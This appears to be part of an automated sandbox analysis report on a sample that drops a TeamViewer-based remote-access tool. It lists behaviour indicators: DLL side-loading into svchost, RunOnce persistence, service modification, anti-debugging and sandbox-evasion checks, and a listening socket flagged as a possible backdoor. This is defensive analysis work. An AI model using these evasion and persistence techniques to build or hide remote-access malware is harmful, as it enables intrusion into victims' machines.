Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Mutant created: \Sessions\1\BaseNamedObjects\DynGateInstanceMutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Mutant created: \Sessions\1\BaseNamedObjects\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagMKKJJIAAADFBAAAA
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Mutant created: \Sessions\1\BaseNamedObjects\TeamViewer3_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Mutant created: \Sessions\1\BaseNamedObjects\TeamViewer_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F334E50 FindResourceW,LoadResource,SizeofResource,LockResource,GetProcessHeap,HeapAlloc,RtlMoveMemory,FreeResource, 2_2_6F334E50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe File created: C:\Program Files (x86)\QS
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File written: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.ini
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: 77Etc0bR2v.exe Static file information: File size 1828192 > 1048576
Source: 77Etc0bR2v.exe Static PE information: certificate valid
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp, svchost.exe, 00000006.00000002.748672807.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.467680448.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.479287656.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.475980706.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485151608.000000006F33D000.00000002.00020000.sdmp, nso5B2F.tmp.1.dr

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33C101 push ecx; ret 2_2_6F33C114
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_0075C004 push ebp; retf 3_2_0075C018
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_0053E60D push ecx; ret 3_2_0053E620
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_0053BD8D push ecx; ret 3_2_0053BDA0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_0075BFE4 push ebp; retf 3_2_0075C018
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F33C101 push ecx; ret 3_2_6F33C114
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F33C101 push ecx; ret 6_2_6F33C114
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 11_2_026F4DB0 push esi; ret 11_2_026F4DB1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_02721B50 push ecx; retf 12_3_02721B3A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_02725320 push ecx; iretd 12_3_02725322
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 12_3_026F703A push ecx; ret 12_3_026F7042
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress, 1_2_00405E88

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe WMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File created: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: C:\Users\user\Desktop\77Etc0bR2v.exe File created: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F3344D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree, 2_2_6F3344D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004E177C __EH_prolog3,GetModuleFileNameW,PathRemoveFileSpecW,_wcscat_s,_memset,GetPrivateProfileStringW, 3_2_004E177C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F3344D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree, 3_2_6F3344D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F3344D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree, 6_2_6F3344D0

Boot Survival:

Creates or modifies windows services
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\USBManager\Parameters
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F3337D0 QueryServiceConfigA,QueryServiceConfigA,GetProcessHeap,HeapAlloc,QueryServiceConfigA,ChangeServiceConfigA,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceA, 2_2_6F3337D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exe

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004FB7F9 3_2_004FB7F9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004DC9D6 3_2_004DC9D6
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_00500C6A 3_2_00500C6A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004FFF68 3_2_004FFF68
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe TID: 5560 Thread sleep count: 269 > 30
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe TID: 5560 Thread sleep time: -134500s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5264 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5720 Thread sleep time: -30000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Last function: Thread delayed
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 2_2_6F33B0A0
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004FFF68 3_2_004FFF68
Contains functionality to query network adapter information
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: __EH_prolog3,GetAdaptersInfo,_malloc,GetAdaptersInfo, 3_2_004B9A29
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: GetAdaptersInfo, 3_2_6F3382F0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00405E61 FindFirstFileA,FindClose, 1_2_00405E61
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_0040263E FindFirstFileA, 1_2_0040263E
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 1_2_0040548B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose, 2_2_6F332DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose, 2_2_6F3328B0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_004BF3A9 __EH_prolog3,GetVolumeInformationW,FindFirstFileW,FindClose,FindFirstFileW,FindClose,GetVolumeInformationW, 3_2_004BF3A9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_0050331C __EH_prolog3_catch,FindFirstFileW,GetLastError,__CxxThrowException@8,FindClose, 3_2_0050331C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose, 3_2_6F332DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose, 3_2_6F3328B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F332DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose, 6_2_6F332DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F3328B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose, 6_2_6F3328B0
Source: svchost.exe, 00000014.00000002.749355403.00000282E9C72000.00000004.00000001.sdmp Binary or memory string: $@Hyper-V RAW
Source: TeamViewer.exe, 00000003.00000002.754192652.0000000005790000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.491168196.000001C4950E3000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.747809798.00000282E4429000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: TeamViewer.exe, 00000003.00000003.412988843.0000000000B1C000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWSysWOW64\FirewallControlPanel.dll,-12122!3
Source: svchost.exe, 0000000E.00000002.490833749.000001C4950A9000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW

Anti Debugging:

Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Open window title or class name: ollydbg
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe System information queried: CodeIntegrityInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0053496B
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree, 2_2_6F33B0A0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress, 1_2_00405E88
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33B510 GetProcessHeap,HeapFree,HeapFree,HeapDestroy, 2_2_6F33B510
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F33C1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_6F33C1E2
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_0051523A _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0051523A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0053496B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_00534A9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00534A9B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6F33C1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_6F33C1E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_6F33C1E2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_6F33C1E2

HIPS / PFW / Operating System Protection Evasion:

DLL side loading technique detected
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F335130 LogonUserW,GetLastError,CloseHandle, 2_2_6F335130
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Process created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F333390 OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,GetProcessHeap,GetProcessHeap,HeapAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,ConvertSidToStringSidA,FreeSid,GetProcessHeap,HeapFree,CloseHandle, 2_2_6F333390
Source: TeamViewer.exe, 00000003.00000002.753868992.0000000003DD0000.00000004.00000001.sdmp Binary or memory string: Program Manager
Source: TeamViewer.exe, 00000003.00000002.751436078.0000000000FA0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: TeamViewer.exe, 00000003.00000002.751436078.0000000000FA0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: TeamViewer.exe, 00000003.00000002.751436078.0000000000FA0000.00000002.00020000.sdmp Binary or memory string: &Program Manager
Source: TeamViewer.exe, 00000003.00000002.751436078.0000000000FA0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWndThumbnailClassDV2ControlHostBaseBarTeamViewer_TitleBarWindowProgmanTVWidgetWin#32771teamviewerdebug.exeteamviewer.exeQuick Connect ButtonStartmenuTaskbarDesktopsidebar.exe\VarFileInfo\Translation\StringFileInfo\%04x%04x\FileDescription.exeOther applicationsSideBar_HTMLHostWindowSideBar_AppBarBulletBasicWindowTVWhiteboardOverlayWindowButtonEnableApplicationSelection: %1% (..\Server\WindowOberserver.cpp, 720)SelectAllWindows: %1%;%2% (..\Server\WindowOberserver.cpp, 751)SetSingleWindow (..\Server\WindowOberserver.cpp, 820)SessionEnded: %1% (..\Server\WindowOberserver.cpp, 827)SessionStart: %1%; type: %2% (..\Server\WindowOberserver.cpp, 910)HandleDesktopChanged: %1% (..\Server\WindowOberserver.cpp, 1017)Winlogonmap/set<T> too long
Source: TeamViewer.exe, 00000003.00000002.753868992.0000000003DD0000.00000004.00000001.sdmp Binary or memory string: user841675usProgram ManagerC:\Windows\explorer.exe3910722678072

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree, 2_2_6F336D50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: GetLocaleInfoA,_xtoa_s@20, 3_2_0054113A
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: GetLocaleInfoA, 3_2_0054E79D
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: _LcidFromHexString,GetLocaleInfoA, 3_2_0054E87F
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen, 3_2_0054E915
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: GetLocaleInfoA, 3_2_0054D9D0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 3_2_0054E987
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 3_2_0054EB57
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 3_2_0054EC7B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 3_2_0054EC16
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s, 3_2_0054ECB7
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree, 3_2_6F336D50
Source: C:\Windows\SysWOW64\svchost.exe Code function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree, 6_2_6F336D50
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_0054B459 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 2_2_0054B459
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDList,762AA680,lstrcat,lstrlen, 1_2_00405B88
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 2_2_6F338510 DisableThreadLibraryCalls,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryA,ExitProcess,PathAddBackslashA,PathAddBackslashA,GetProcessHeap,HeapAlloc,GetModuleFileNameA,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecA,PathAddBackslashA,SetCurrentDirectoryA,SHGetSpecialFolderPathA,PathAddBackslashA,wsprintfA,GetFileAttributesA,GetFileAttributesA,ExitProcess,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,wsprintfA,GetFileAttributesA,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameA,PathFindFileNameA,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,GetProcessHeap,HeapAlloc,GetUserNameW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,wsprintfA,lstrlenA,GetCommandLineA,CharLowerA,StrToIntA,LocalFree,RtlZeroMemory,GetPrivateProfileIntA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,ExitProcess,RtlZeroMemory,NtQuerySystemInformation,wsprintfA,wsprintfA,LoadLibraryA,FindWindowW,FindWindowW,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,LoadLibraryA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LoadLibraryA,wsprintfA,LoadLibraryA,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle, 2_2_6F338510

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_00511D6F __EH_prolog3_catch,_memset,_memset,socket,WSAGetLastError,htonl,inet_addr,htons,WSAGetLastError,bind,bind,WSAGetLastError,Sleep,bind,listen,WSAGetLastError,select,WSAGetLastError,getsockname,WSAGetLastError,Sleep,__WSAFDIsSet,accept,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,WSAGetLastError,Sleep,GetTickCount,__WSAFDIsSet,WSAGetLastError,_strncmp,_strncmp,_strncpy,shutdown,Sleep,listen,Sleep,listen,WSAGetLastError,accept,Sleep,_memset,WSAGetLastError,_memset,select,_strncmp, 3_2_00511D6F